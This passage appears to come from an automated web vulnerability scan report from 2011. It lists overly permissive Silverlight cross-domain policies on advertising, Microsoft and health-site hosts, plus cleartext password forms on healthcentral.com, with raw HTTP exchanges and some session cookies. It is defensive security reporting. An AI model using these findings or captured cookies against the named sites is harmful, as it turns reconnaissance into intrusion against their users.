Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Tue, 19 Jul 2011 01:58:24 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 01:58:26 GMT
Date: Tue, 19 Jul 2011 01:58:26 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.3. http://c.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

4.4. http://c.scout.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.scout.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:04:45 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

4.5. http://dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:11:01 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

4.6. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 430187
Date: Tue, 19 Jul 2011 12:09:28 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 12:39:41 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.7. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 418392
Date: Tue, 19 Jul 2011 12:09:28 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 15:56:16 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.8. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 426398
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:42:48 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.9. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 421787
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 14:59:39 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.10. http://img1.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.11. http://img2.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.12. http://img3.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:33 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.13. http://img4.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:34 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

4.14. http://minerva.healthcentral.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://minerva.healthcentral.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: minerva.healthcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Omniture DC/2.0.0
xserver: www618
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.15. http://t0.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: t0.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Content-Length: 458

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

4.16. http://a1.bing4.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:11:03 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=010A9B912128428D9CC0A0CA58307B38; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=4F2C78F6A846443C838C5F5B8F68F756; expires=Thu, 18-Jul-2013 12:11:03 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:11:03 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.17. http://a2.bing4.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a2.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:11:03 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=D2310D8AF19D43B7AD6FFE0BB6937BF7; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BF71C6B6773A407FB9A0454069AB43B7; expires=Thu, 18-Jul-2013 12:11:03 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:11:03 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.18. http://a4.bing4.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a4.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:11:03 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=E569119BEA404A6CAF50CA8FDABB1C08; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=EFDD1930A12645738E8ABD33EE8480A8; expires=Thu, 18-Jul-2013 12:11:03 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:11:03 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.19. http://ts1.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:24 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.20. http://ts2.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.21. http://ts3.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts3.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts3.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

4.22. http://ts4.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts4.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts4.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

5. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/ HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d; c_search=_search; s_cc=true; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:58:54 GMT
Date: Tue, 19 Jul 2011 01:58:54 GMT
Content-Length: 36637
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Feeling Low Self-Worth - Common Symptoms of ADD & ADHD in Women - ADHD</titl
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

5.2. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcentral.com
